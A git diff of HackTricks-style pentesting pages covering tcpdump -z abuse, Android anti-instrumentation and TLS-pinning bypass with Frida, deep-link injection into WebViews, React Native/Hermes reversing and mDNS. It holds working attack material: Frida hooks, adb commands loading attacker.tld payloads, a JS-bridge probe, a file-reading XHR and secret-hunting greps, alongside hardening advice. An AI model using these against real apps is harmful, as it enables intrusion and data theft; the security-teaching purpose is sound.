- If you have any other primitive to write files (e.g., a separate command wrapper that allows output redirection), drop your script into a known path and trigger `-z /bin/sh /path/script.sh` or `-z /path/script.sh` depending on platform semantics.
- Some vendor wrappers rotate to attacker-controllable locations. If you can influence the rotated path (symlink/directory traversal), you can steer `-z` to execute content you fully control without external media.
Hardening tips for vendors:
- Never pass user-controlled strings directly to `tcpdump` (or any tool) without strict allowlists. Quote and validate.
- Do not expose `-z` functionality in wrappers; run tcpdump with a fixed safe template and disallow extra flags entirely.
- Drop tcpdump privileges (cap_net_admin/cap_net_raw only) or run under a dedicated unprivileged user with AppArmor/SELinux confinement.
## Detection & Hardening
1. **Disable shell globbing** in critical scripts: `set -f` (`set -o noglob`) prevents wildcard expansion.
@ -134,5 +180,7 @@ These primitives are less common than the *tar/rsync/zip* classics but worth che
* Elastic Security Potential Shell via Wildcard Injection Detected rule (last updated 2025)
* Rutger Flohil “macOS — Tar wildcard injection” (Dec 18 2024)
* GTFOBins [tcpdump](https://gtfobins.github.io/gtfobins/tcpdump/)
* FiberGateway GR241AG [Full Exploit Chain](https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -470,6 +470,12 @@ If you want to pentest Android applications you need to know how to use Frida.
- You can find some Awesome Frida scripts here: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
- Try to bypass anti-debugging / anti-frida mechanisms loading Frida as in indicated in [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) (tool [linjector](https://github.com/erfur/linjector-rs))
#### Anti-instrumentation & SSL pinning bypass workflow
{{#ref}}
android-anti-instrumentation-and-ssl-pinning-bypass.md
{{#endref}}
### **Dump Memory - Fridump**
Check if the application is storing sensitive information inside the memory that it shouldn't be storing like passwords or mnemonics.

View File

@ -0,0 +1,227 @@
# Android Anti-Instrumentation & SSL Pinning Bypass (Frida/Objection)
{{#include ../../banners/hacktricks-training.md}}
This page provides a practical workflow to regain dynamic analysis against Android apps that detect/rootblock instrumentation or enforce TLS pinning. It focuses on fast triage, common detections, and copypasteable hooks/tactics to bypass them without repacking when possible.
## Detection Surface (what apps check)
- Root checks: su binary, Magisk paths, getprop values, common root packages
- Frida/debugger checks (Java): Debug.isDebuggerConnected(), ActivityManager.getRunningAppProcesses(), getRunningServices(), scanning /proc, classpath, loaded libs
- Native antidebug: ptrace(), syscalls, antiattach, breakpoints, inline hooks
- Early init checks: Application.onCreate() or process start hooks that crash if instrumentation is present
- TLS pinning: custom TrustManager/HostnameVerifier, OkHttp CertificatePinner, Conscrypt pinning, native pins
## Step 1 — Quick win: hide root with Magisk DenyList
- Enable Zygisk in Magisk
- Enable DenyList, add the target package
- Reboot and retest
Many apps only look for obvious indicators (su/Magisk paths/getprop). DenyList often neutralizes naive checks.
References:
- Magisk (Zygisk & DenyList): https://github.com/topjohnwu/Magisk
## Step 2 — 30second Frida Codeshare tests
Try common dropin scripts before deep diving:
- anti-root-bypass.js
- anti-frida-detection.js
- hide_frida_gum.js
Example:
```bash
frida -U -f com.example.app -l anti-frida-detection.js
```
These typically stub Java root/debug checks, process/service scans, and native ptrace(). Useful on lightly protected apps; hardened targets may need tailored hooks.
- Codeshare: https://codeshare.frida.re/
## Step 3 — Bypass init-time detectors by attaching late
Many detections only run during process spawn/onCreate(). Spawntime injection (-f) or gadgets get caught; attaching after UI loads can slip past.
```bash
# Launch the app normally (launcher/adb), wait for UI, then attach
frida -U -n com.example.app
# Or with Objection to attach to running process
aobjection --gadget com.example.app explore # if using gadget
```
If this works, keep the session stable and proceed to map and stub checks.
## Step 4 — Map detection logic via Jadx and string hunting
Static triage keywords in Jadx:
- "frida", "gum", "root", "magisk", "ptrace", "su", "getprop", "debugger"
Typical Java patterns:
```java
public boolean isFridaDetected() {
return getRunningServices().contains("frida");
}
```
Common APIs to review/hook:
- android.os.Debug.isDebuggerConnected
- android.app.ActivityManager.getRunningAppProcesses / getRunningServices
- java.lang.System.loadLibrary / System.load (native bridge)
- java.lang.Runtime.exec / ProcessBuilder (probing commands)
- android.os.SystemProperties.get (root/emulator heuristics)
## Step 5 — Runtime stubbing with Frida (Java)
Override custom guards to return safe values without repacking:
```js
Java.perform(() => {
const Checks = Java.use('com.example.security.Checks');
Checks.isFridaDetected.implementation = function () { return false; };
// Neutralize debugger checks
const Debug = Java.use('android.os.Debug');
Debug.isDebuggerConnected.implementation = function () { return false; };
// Example: kill ActivityManager scans
const AM = Java.use('android.app.ActivityManager');
AM.getRunningAppProcesses.implementation = function () { return java.util.Collections.emptyList(); };
});
```
Triaging early crashes? Dump classes just before it dies to spot likely detection namespaces:
```js
Java.perform(() => {
Java.enumerateLoadedClasses({
onMatch: n => console.log(n),
onComplete: () => console.log('Done')
});
});
```
Log and neuter suspicious methods to confirm execution flow:
```js
Java.perform(() => {
const Det = Java.use('com.example.security.DetectionManager');
Det.checkFrida.implementation = function () {
console.log('checkFrida() called');
return false;
};
});
```
## Step 6 — Follow the JNI/native trail when Java hooks fail
Trace JNI entry points to locate native loaders and detection init:
```bash
frida-trace -n com.example.app -i "JNI_OnLoad"
```
Quick native triage of bundled .so files:
```bash
# List exported symbols & JNI
nm -D libfoo.so | head
objdump -T libfoo.so | grep Java_
strings -n 6 libfoo.so | egrep -i 'frida|ptrace|gum|magisk|su|root'
```
Interactive/native reversing:
- Ghidra: https://ghidra-sre.org/
- r2frida: https://github.com/nowsecure/r2frida
Example: neuter ptrace to defeat simple antidebug in libc:
```js
const ptrace = Module.findExportByName(null, 'ptrace');
if (ptrace) {
Interceptor.replace(ptrace, new NativeCallback(function () {
return -1; // pretend failure
}, 'int', ['int', 'int', 'pointer', 'pointer']));
}
```
See also: {{#ref}}
reversing-native-libraries.md
{{#endref}}
## Step 7 — Objection patching (embed gadget / strip basics)
When you prefer repacking to runtime hooks, try:
```bash
objection patchapk --source app.apk
```
Notes:
- Requires apktool; ensure a current version from the official guide to avoid build issues: https://apktool.org/docs/install
- Gadget injection enables instrumentation without root but can still be caught by stronger inittime checks.
References:
- Objection: https://github.com/sensepost/objection
## Step 8 — Fallback: Patch TLS pinning for network visibility
If instrumentation is blocked, you can still inspect traffic by removing pinning statically:
```bash
apk-mitm app.apk
# Then install the patched APK and proxy via Burp/mitmproxy
```
- Tool: https://github.com/shroudedcode/apk-mitm
- For network config CAtrust tricks (and Android 7+ user CA trust), see:
{{#ref}}
make-apk-accept-ca-certificate.md
{{#endref}}
{{#ref}}
install-burp-certificate.md
{{#endref}}
## Handy command cheatsheet
```bash
# List processes and attach
frida-ps -Uai
frida -U -n com.example.app
# Spawn with a script (may trigger detectors)
frida -U -f com.example.app -l anti-frida-detection.js
# Trace native init
frida-trace -n com.example.app -i "JNI_OnLoad"
# Objection runtime
objection --gadget com.example.app explore
# Static TLS pinning removal
apk-mitm app.apk
```
## Tips & caveats
- Prefer attaching late over spawning when apps crash at launch
- Some detections rerun in critical flows (e.g., payment, auth) — keep hooks active during navigation
- Mix static and dynamic: string hunt in Jadx to shortlist classes; then hook methods to verify at runtime
- Hardened apps may use packers and native TLS pinning — expect to reverse native code
## References
- [Reversing Android Apps: Bypassing Detection Like a Pro](https://www.kayssel.com/newsletter/issue-12/)
- [Frida Codeshare](https://codeshare.frida.re/)
- [Objection](https://github.com/sensepost/objection)
- [apk-mitm](https://github.com/shroudedcode/apk-mitm)
- [Jadx](https://github.com/skylot/jadx)
- [Ghidra](https://ghidra-sre.org/)
- [r2frida](https://github.com/nowsecure/r2frida)
- [Apktool install guide](https://apktool.org/docs/install)
- [Magisk](https://github.com/topjohnwu/Magisk)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -2,9 +2,67 @@
{{#include ../../banners/hacktricks-training.md}}
**Take a look to: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**
Intent injection abuses components that accept attacker-controlled Intents or data that is later converted into Intents. Two very common patterns during Android app pentests are:
{{#include ../../banners/hacktricks-training.md}}
- Passing crafted extras to exported Activities/Services/BroadcastReceivers that are later forwarded to privileged, non-exported components.
- Triggering exported VIEW/BROWSABLE deep links that forward attacker-controlled URLs into internal WebViews or other sensitive sinks.
## Deep links → WebView sink (URL parameter injection)
If an app exposes a custom scheme deep link such as:
```text
myscheme://com.example.app/web?url=<attacker_url>
```
and the receiving Activity forwards the `url` query parameter into a WebView, you can force the app to render arbitrary remote content in its own WebView context.
PoC via adb:
```bash
# Implicit VIEW intent
adb shell am start -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
# Or explicitly target an Activity
adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
```
Impact
- HTML/JS executes inside the apps WebView profile.
- If JavaScript is enabled (by default or due to misordered checks), you can enumerate/use any exposed `@JavascriptInterface` objects, steal WebView cookies/local storage, and pivot.
See also:
{{#ref}}
webview-attacks.md
{{#endref}}
## Order-of-checks bug enabling JavaScript
A recurring bug is enabling JavaScript (or other permissive WebView settings) before the final URL allowlist/verification finishes. If early helpers accept your deep link and the WebView is configured first, your final load happens with JavaScript already enabled even if later checks are flawed or too late.
What to look for in decompiled code:
- Multiple helpers that parse/split/rebuild the URL differently (inconsistent normalization).
- Calls to `getSettings().setJavaScriptEnabled(true)` before the last host/path allowlist check.
- A pipeline like: parse → partial validate → configure WebView → final verify → loadUrl.
Mitigations
- Canonicalize once and validate strictly; fail closed.
- Only enable JavaScript after all checks pass and just before loading trusted content.
- Avoid exposing bridges to untrusted origins.
## Other classic Intent injection primitives
- startActivity/sendBroadcast using attacker-supplied `Intent` extras that are later re-parsed (`Intent.parseUri(...)`) and executed.
- Exported proxy components that forward Intents to non-exported sensitive components without permission checks.
## References
- [Android Access to app-protected components](https://blog.oversecured.com/Android-Access-to-app-protected-components/)
- [Samsung S24 Exploit Chain Pwn2Own 2024 Walkthrough](https://medium.com/@happyjester80/samsung-s24-exploit-chain-pwn2own-2024-walkthrough-c7a3da9a7a26)
- [Pwn2Own Ireland 2024 Samsung S24 attack chain (whitepaper)](https://maliciouserection.com/2025/05/13/pwn2own-ireland-2024-samsung-s24-attack-chain-whitepaper.html)
- [Demonstration video](https://www.youtube.com/watch?v=LAIr2laU-So)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -10,6 +10,22 @@ To confirm if the application was built on the React Native framework, follow th
3. Use the command `find . -print | grep -i ".bundle$"` to search for the JavaScript file.
Note: If you are given an Android App Bundle (.aab) instead of an APK, generate a universal APK first and then extract the bundle:
```bash
# Get bundletool.jar and generate a universal APK set
java -jar bundletool.jar build-apks \
--bundle=app-release.aab \
--output=app.apks \
--mode=universal \
--overwrite
# Extract the APK and then unzip it to find assets/index.android.bundle
unzip -p app.apks universal.apk > universal.apk
unzip -qq universal.apk -d ReactNative
ls ReactNative/assets/
```
## Javascript Code
If checking the contents of the `index.android.bundle` you find the JavaScript code of the application (even if minified), you can **analyze it to find sensitive information and vulnerabilities**.
@ -42,12 +58,37 @@ To search for sensitive credentials and endpoints, follow these steps:
3. It was fortunate that sensitive hard-coded credentials were found in the JavaScript code during the recon process.
### Quick secrets/endpoint hunting in bundles
These simple greps often surface interesting indicators even in minified JS:
```bash
# Common backends and crash reporters
strings -n 6 index.android.bundle | grep -Ei "(api\.|graphql|/v1/|/v2/|socket|wss://|sentry\.io|bugsnag|appcenter|codepush|firebaseio\.com|amplify|aws)"
# Firebase / Google keys (heuristics)
strings -n 6 index.android.bundle | grep -Ei "(AIza[0-9A-Za-z_-]{35}|AIzaSy[0-9A-Za-z_-]{33})"
# AWS access key id heuristic
strings -n 6 index.android.bundle | grep -E "AKIA[0-9A-Z]{16}"
# Expo/CodePush deployment keys
strings -n 6 index.android.bundle | grep -Ei "(CodePush|codepush:\\/\\/|DeploymentKey)"
# Sentry DSN
strings -n 6 index.android.bundle | grep -Ei "(Sentry\.init|dsn\s*:)"
```
If you suspect Over-The-Air update frameworks, also hunt for:
- Microsoft App Center / CodePush deployment keys
- Expo EAS Updates configuration (`expo-updates`, `expo\.io`, signing certs)
### Change JS code and rebuild
In this case changing the code is easy. You just need to rename the app to use the extension `.zip` and extract it. Then you can **modify the JS code inside this bundle and rebuild the app**. This should be enough to allow you to **inject code** in the app for testing purpses.
In this case changing the code is easy. You just need to rename the app to use the extension `.zip` and extract it. Then you can **modify the JS code inside this bundle and rebuild the app**. This should be enough to allow you to **inject code** in the app for testing purposes.
## Hermes bytecode
## Hermes bytecode
If the bundle contains **Hermes bytecode**, you **won't be able to access the Javascript code** of the app (not even to the minified version).
@ -58,35 +99,114 @@ file index.android.bundle
index.android.bundle: Hermes JavaScript bytecode, version 96
```
However, you can use the tools **[hbctool](https://github.com/bongtrop/hbctool)**, **[hermes-dec](https://github.com/P1sec/hermes-dec)** or **[hermes_rs](https://github.com/Pilfer/hermes_rs)** to **disassemble the bytecode** and also to **decompile it to some pseudo JS code**. To do this, for example these commands:
However, you can use the tools **[hbctool](https://github.com/bongtrop/hbctool)**, updated forks of hbctool that support newer bytecode versions, **[hasmer](https://github.com/lucasbaizer2/hasmer)**, **[hermes_rs](https://github.com/Pilfer/hermes_rs)** (Rust library/APIs), or **[hermes-dec](https://github.com/P1sec/hermes-dec)** to **disassemble the bytecode** and also to **decompile it to some pseudo JS code**. For example:
```bash
# Disassemble and re-assemble with hbctool (works only for supported HBC versions)
hbctool disasm ./index.android.bundle ./hasm_out
# ...edit ./hasm_out/**/*.hasm (e.g., change comparisons, constants, feature flags)...
hbctool asm ./hasm_out ./index.android.bundle
# Using hasmer (focus on disassembly; assembler/decompiler are WIP)
hasmer disasm ./index.android.bundle -o hasm_out
# Using hermes-dec to produce pseudo-JS
hbc-disassembler ./index.android.bundle /tmp/my_output_file.hasm
hbc-decompiler ./index.android.bundle /tmp/my_output_file.js
hbc-decompiler ./index.android.bundle /tmp/my_output_file.js
```
### Change code and rebuild
Tip: The open-source Hermes project also ships developer tools such as `hbcdump` in specific Hermes releases. If you build the matching Hermes version used to produce the bundle, `hbcdump` can dump functions, string tables, and bytecode for deeper analysis.
Ideally you should be able to modify the dissasembled code (changing a comparison, or a value or whatever you need to modify) and then **rebuild the bytecode** and then rebuild the app.
### Change code and rebuild (Hermes)
The tool **[hbctool](https://github.com/bongtrop/hbctool)** supports dissasembling the bundle and building it back after the changes have been performed, however it **only supports old versions** of Hermes bytecode.
Ideally you should be able to modify the disassembled code (changing a comparison, or a value or whatever you need to modify) and then **rebuild the bytecode** and rebuild the app.
The tool **[hermes-dec](https://github.com/P1sec/hermes-dec)** doesn't support rebuilding the bytecode.
- The original **[hbctool](https://github.com/bongtrop/hbctool)** supports disassembling the bundle and building it back after changes, but historically supported only older bytecode versions. Community-maintained forks extend support to newer Hermes versions (including mid-80s96) and are often the most practical option to patch modern RN apps.
- The tool **[hermes-dec](https://github.com/P1sec/hermes-dec)** does not support rebuilding the bytecode (decompiler/disassembler only), but its very helpful to navigate logic and dump strings.
- The tool **[hasmer](https://github.com/lucasbaizer2/hasmer)** aims to support both disassembly and assembly for multiple Hermes versions; assembling is still maturing but worth trying on recent bytecode.
The tool **[hermes_rs](https://github.com/Pilfer/hermes_rs)** supports rebuilding the bytecode, but it's actually a library and nto a CLI tool.
A minimal workflow with hbctool-like assemblers:
## Dyanmic Analysis
```bash
# 1) Disassemble to HASM directories
hbctool disasm assets/index.android.bundle ./hasm
# 2) Edit a guard or feature flag (example: force boolean true)
# In the relevant .hasm, replace a LoadConstUInt8 0 with 1
# or change a conditional jump target to bypass a check.
# 3) Reassemble into a new bundle
hbctool asm ./hasm assets/index.android.bundle
# 4) Repack the APK and resign
zip -r ../patched.apk *
# Align/sign as usual (see Android signing section in HackTricks)
```
Note that Hermes bytecode format is versioned and the assembler must match the exact on-disk format. If you get format errors, switch to an updated fork/alternative or rebuild the matching Hermes tooling.
## Dynamic Analysis
You could try to dynamically analyze the app would be to use Frida to enable the developer mode of the React app and use **`react-native-debugger`** to attach to it. However, for this you need the source code of the app apparently. You can find more info about this in [https://newsroom.bedefended.com/hooking-react-native-applications-with-frida/](https://newsroom.bedefended.com/hooking-react-native-applications-with-frida/).
### Enabling Dev Support in release with Frida (caveats)
Some apps accidentally ship classes that make Dev Support togglable. If present, you can try forcing `getUseDeveloperSupport()` to return true:
```javascript
// frida -U -f com.target.app -l enable-dev.js
Java.perform(function(){
try {
var Host = Java.use('com.facebook.react.ReactNativeHost');
Host.getUseDeveloperSupport.implementation = function(){
return true; // force dev support
};
console.log('[+] Patched ReactNativeHost.getUseDeveloperSupport');
} catch (e) {
console.log('[-] Could not patch: ' + e);
}
});
```
Warning: In properly built release builds, `DevSupportManagerImpl` and related debug-only classes are stripped and flipping this flag can crash the app or have no effect. When this works, you can typically expose the dev menu and attach debuggers/inspectors.
### Network interception in RN apps
React Native Android typically relies on OkHttp under the hood (via the `Networking` native module). To intercept/observe traffic on a non-rooted device during dynamic tests:
- Use system proxy + trust user CA or use other generic Android TLS bypass techniques.
- RN-specific tip: if the app bundles Flipper in release by mistake (debug tooling), the Flipper Network plugin can expose requests/responses.
For generic Android interception and pinning bypass techniques refer to:
{{#ref}}
make-apk-accept-ca-certificate.md
{{#endref}}
{{#ref}}
frida-tutorial/objection-tutorial.md
{{#endref}}
## Recent issues in popular RN libraries (what to look for)
When auditing thirdparty modules visible in the JS bundle or native libs, check for known vulns and verify versions in `package.json`/`yarn.lock`.
- react-native-mmkv (Android): versions prior to 2.11.0 logged the optional encryption key to Android logs. If ADB/logcat is available, secrets could be recovered. Ensure >= 2.11.0. Indicators: usage of `react-native-mmkv`, log statements mentioning MMKV init with encryption. CVE-2024-21668.
- react-native-document-picker: versions < 9.1.1 were vulnerable to path traversal on Android (file selection), fixed in 9.1.1. Validate inputs and library version.
Quick checks:
```bash
grep -R "react-native-mmkv" -n {index.android.bundle,*.map} 2>/dev/null || true
grep -R "react-native-document-picker" -n {index.android.bundle,*.map} 2>/dev/null || true
# If you also have the node_modules (rare on release): grep -R in package.json / yarn.lock
```
## References
- [https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)
- [https://www.assetnote.io/resources/research/expanding-the-attack-surface-react-native-android-applications](https://www.assetnote.io/resources/research/expanding-the-attack-surface-react-native-android-applications)
- [https://payatu.com/wp-content/uploads/2023/02/Mastering-React-Native-Application-Pentesting-A-Practical-Guide-2.pdf](https://payatu.com/wp-content/uploads/2023/02/Mastering-React-Native-Application-Pentesting-A-Practical-Guide-2.pdf)
- CVE-2024-21668: react-native-mmkv logs encryption key on Android, fixed in v2.11.0 (NVD): https://nvd.nist.gov/vuln/detail/CVE-2024-21668
- hbctool (and forks) for Hermes assemble/disassemble: https://github.com/bongtrop/hbctool
{{#include ../../banners/hacktricks-training.md}}

View File

@ -136,15 +136,264 @@ xhr.open(
xhr.send(null)
```
# Webview Attacks
## Guide on WebView Configurations and Security
### Overview of WebView Vulnerabilities
A critical aspect of Android development involves the correct handling of WebViews. This guide highlights key configurations and security practices to mitigate risks associated with WebView usage.
![WebView Example](<../../images/image (1190).png>)
### **File Access in WebViews**
By default, WebViews permit file access. This functionality is controlled by the `setAllowFileAccess()` method, available since Android API level 3 (Cupcake 1.5). Applications with the **android.permission.READ_EXTERNAL_STORAGE** permission can read files from external storage using a file URL scheme (`file://path/to/file`).
#### **Deprecated Features: Universal and File Access From URLs**
- **Universal Access From File URLs**: This deprecated feature allowed cross-origin requests from file URLs, posing a significant security risk due to potential XSS attacks. The default setting is disabled (`false`) for apps targeting Android Jelly Bean and newer.
- To check this setting, use `getAllowUniversalAccessFromFileURLs()`.
- To modify this setting, use `setAllowUniversalAccessFromFileURLs(boolean)`.
- **File Access From File URLs**: This feature, also deprecated, controlled access to content from other file scheme URLs. Like universal access, its default is disabled for enhanced security.
- Use `getAllowFileAccessFromFileURLs()` to check and `setAllowFileAccessFromFileURLs(boolean)` to set.
#### **Secure File Loading**
For disabling file system access while still accessing assets and resources, the `setAllowFileAccess()` method is used. With Android R and above, the default setting is `false`.
- Check with `getAllowFileAccess()`.
- Enable or disable with `setAllowFileAccess(boolean)`.
#### **WebViewAssetLoader**
The **WebViewAssetLoader** class is the modern approach for loading local files. It uses http(s) URLs for accessing local assets and resources, aligning with the Same-Origin policy, thus facilitating CORS management.
### loadUrl
This is a common function used to load arbitrary URLs in a webviwe:
```java
webview.loadUrl("<url here>")
```
Ofc, a potential attacker should never be able to **control the URL** that an application is going to load.
### Deep-linking into internal WebView (custom scheme → WebView sink)
Many apps register custom schemes/paths that route a user-supplied URL into an in-app WebView. If the deep link is exported (VIEW + BROWSABLE), an attacker can force the app to render arbitrary remote content inside its WebView context.
Typical manifest pattern (simplified):
```xml
<activity android:name=".MainActivity" android:exported="true">
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data android:scheme="myscheme" android:host="com.example.app" />
</intent-filter>
</activity>
```
Common code flow (simplified):
```java
// Entry activity
@Override
protected void onNewIntent(Intent intent) {
Uri deeplink = intent.getData();
String url = deeplink.getQueryParameter("url"); // attacker-controlled
if (deeplink.getPathSegments().get(0).equals("web")) {
Intent i = new Intent(this, WebActivity.class);
i.putExtra("url", url);
startActivity(i);
}
}
// WebActivity sink
webView.loadUrl(getIntent().getStringExtra("url"));
```
Attack pattern and PoC via adb:
```bash
# Template force load in internal WebView
adb shell am start -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
# If a specific Activity must be targeted
adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
```
Impact: the remote page runs in the app WebView context (cookies/session of the app WebView profile, access to any exposed @JavascriptInterface, potential access to content:// and file:// depending on settings).
Hunting tips:
- Grep decompiled sources for `getQueryParameter("url")`, `loadUrl(`, `WebView` sinks, and deep-link handlers (`onCreate/onNewIntent`).
- Review the manifest for VIEW+BROWSABLE filters and custom schemes/hosts that map to activities that later start a WebView.
- Check if there are multiple deep-link paths (e.g., an “external browser” path vs. an “internal webview” path) and prefer the one that renders inside the app.
### Enabling JavaScript before verification (order-of-checks bug)
A frequent hardening mistake is enabling JavaScript or configuring relaxed WebView settings before the final allowlist/verification of the target URL completes. If the verification is inconsistent across helpers or happens too late, an attacker deep link can reach a state where:
1) WebView settings apply (e.g., `setJavaScriptEnabled(true)`), and
2) The untrusted URL is loaded with JavaScript enabled.
Bug pattern (pseudocode):
```java
// 1) Parse/early checks
Uri u = parse(intent);
if (!looksValid(u)) return;
// 2) Configure WebView BEFORE final checks
webView.getSettings().setJavaScriptEnabled(true); // BAD: too early
configureMixedContent();
// 3) Do final verification (late)
if (!finalAllowlist(u)) return; // too late JS already enabled
// 4) Load
webView.loadUrl(u.toString());
```
Why its exploitable
- Inconsistent normalization: helpers split/rebuild the URL differently than the final check, creating mismatches a malicious URL can exploit.
- Misordered pipeline: enabling JS in step 2 applies globally to the WebView instance, affecting the final load even if verification would later fail.
How to test
- Craft deep-link payloads that pass early checks and reach the WebView configuration site.
- Use adb to fire implicit VIEW intents delivering a `url=` parameter controlled by you:
```bash
adb shell am start -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
```
If exploitation succeeds, your payload executes JavaScript in the apps WebView. From there, probe for exposed bridges:
```html
<script>
for (let k in window) {
try { if (typeof window[k] === 'object' || typeof window[k] === 'function') console.log('[JSI]', k); } catch(e){}
}
</script>
```
Defensive guidance
- Canonicalize once; validate strictly against a single source of truth (scheme/host/path/query).
- Only call `setJavaScriptEnabled(true)` after all allowlist checks pass and just before loading trusted content.
- Avoid exposing `@JavascriptInterface` to untrusted origins; prefer per-origin gating.
- Consider per-WebView instances for trusted vs untrusted content, with JS disabled by default.
### **JavaScript and Intent Scheme Handling**
- **JavaScript**: Disabled by default in WebViews, it can be enabled via `setJavaScriptEnabled()`. Caution is advised as enabling JavaScript without proper safeguards can introduce security vulnerabilities.
- **Intent Scheme**: WebViews can handle the `intent` scheme, potentially leading to exploits if not carefully managed. An example vulnerability involved an exposed WebView parameter "support_url" that could be exploited to execute cross-site scripting (XSS) attacks.
![Vulnerable WebView](<../../images/image (1191).png>)
Exploitation example using adb:
```bash
adb.exe shell am start -n com.tmh.vulnwebview/.SupportWebView es support_url "https://example.com/xss.html"
```
### Javascript Bridge
A feature is provided by Android that enables **JavaScript** in a WebView to invoke **native Android app functions**. This is achieved by utilizing the `addJavascriptInterface` method, which integrates JavaScript with native Android functionalities, termed as a _WebView JavaScript bridge_. Caution is advised as this method allows all pages within the WebView to access the registered JavaScript Interface object, posing a security risk if sensitive information is exposed through these interfaces.
- **Extreme caution is required** for apps targeting Android versions below 4.2 due to a vulnerability allowing remote code execution through malicious JavaScript, exploiting reflection.
#### Implementing a JavaScript Bridge
- **JavaScript interfaces** can interact with native code, as shown in the examples where a class method is exposed to JavaScript:
```javascript
@JavascriptInterface
public String getSecret() {
return "SuperSecretPassword";
};
```
- JavaScript Bridge is enabled by adding an interface to the WebView:
```javascript
webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge")
webView.reload()
```
- Potential exploitation through JavaScript, for instance, via an XSS attack, enables the calling of exposed Java methods:
```html
<script>
alert(javascriptBridge.getSecret())
</script>
```
- To mitigate risks, **restrict JavaScript bridge usage** to code shipped with the APK and prevent loading JavaScript from remote sources. For older devices, set the minimum API level to 17.
### Reflection-based Remote Code Execution (RCE)
- A documented method allows achieving RCE through reflection by executing a specific payload. However, the `@JavascriptInterface` annotation prevents unauthorized method access, limiting the attack surface.
### Remote Debugging
- **Remote debugging** is possible with **Chrome Developer Tools**, enabling interaction and arbitrary JavaScript execution within the WebView content.
#### Enabling Remote Debugging
- Remote debugging can be enabled for all WebViews within an application by:
```java
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
WebView.setWebContentsDebuggingEnabled(true);
}
```
- To conditionally enable debugging based on the application's debuggable state:
```java
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE))
{ WebView.setWebContentsDebuggingEnabled(true); }
}
```
## Exfiltrate arbitrary files
- Demonstrates the exfiltration of arbitrary files using an XMLHttpRequest:
```javascript
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
alert(xhr.responseText)
}
}
xhr.open(
"GET",
"file:///data/data/com.authenticationfailure.wheresmybrowser/databases/super_secret.db",
true
)
xhr.send(null)
```
## References
- [https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html](https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html)
- [https://github.com/authenticationfailure/WheresMyBrowser.Android](https://github.com/authenticationfailure/WheresMyBrowser.Android)
- [https://developer.android.com/reference/android/webkit/WebView](https://developer.android.com/reference/android/webkit/WebView)
- [https://medium.com/@justmobilesec/deep-links-webviews-exploitations-part-ii-5c0b118ec6f1](https://medium.com/@justmobilesec/deep-links-webviews-exploitations-part-ii-5c0b118ec6f1)
- [https://www.justmobilesec.com/en/blog/deep-links-webviews-exploitations-part-I](https://www.justmobilesec.com/en/blog/deep-links-webviews-exploitations-part-I)
- [Review of Android WebViews file access attack vectors](https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html)
- [WheresMyBrowser.Android (demo app)](https://github.com/authenticationfailure/WheresMyBrowser.Android)
- [Android WebView reference](https://developer.android.com/reference/android/webkit/WebView)
- [Deep Links & WebViews Exploitations Part II](https://medium.com/@justmobilesec/deep-links-webviews-exploitations-part-ii-5c0b118ec6f1)
- [Deep Links & WebViews Exploitations Part I](https://www.justmobilesec.com/en/blog/deep-links-webviews-exploitations-part-I)
- [Samsung S24 Exploit Chain Pwn2Own 2024 Walkthrough](https://medium.com/@happyjester80/samsung-s24-exploit-chain-pwn2own-2024-walkthrough-c7a3da9a7a26)
- [Pwn2Own Ireland 2024 Samsung S24 attack chain (whitepaper)](https://maliciouserection.com/2025/05/13/pwn2own-ireland-2024-samsung-s24-attack-chain-whitepaper.html)
- [Demonstration video](https://www.youtube.com/watch?v=LAIr2laU-So)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -2,60 +2,146 @@
{{#include ../banners/hacktricks-training.md}}
## **Basic Information**
## Basic Information
**Multicast DNS (mDNS)** enables **DNS-like operations** within local networks without needing a traditional DNS server. It operates on **UDP port 5353** and allows devices to discover each other and their services, commonly seen in various IoT devices. **DNS Service Discovery (DNS-SD)**, often used alongside mDNS, aids in identifying services available on the network through standard DNS queries.
Multicast DNS (mDNS) enables DNS-like name resolution and service discovery inside a local link without a unicast DNS server. It uses UDP/5353 and the multicast addresses 224.0.0.251 (IPv4) and FF02::FB (IPv6). DNS Service Discovery (DNS-SD, typically used with mDNS) provides a standardized way to enumerate and describe services via PTR, SRV and TXT records.
```
PORT STATE SERVICE
5353/udp open zeroconf
```
### **Operation of mDNS**
Key protocol details youll often leverage during attacks:
- Names in the .local zone are resolved via mDNS.
- QU (Query Unicast) bit may request unicast replies even for multicast questions.
- Implementations should ignore packets not sourced from the local link; some stacks still accept them.
- Probing/announcing enforces unique host/service names; interfering here creates DoS/“name squatting” conditions.
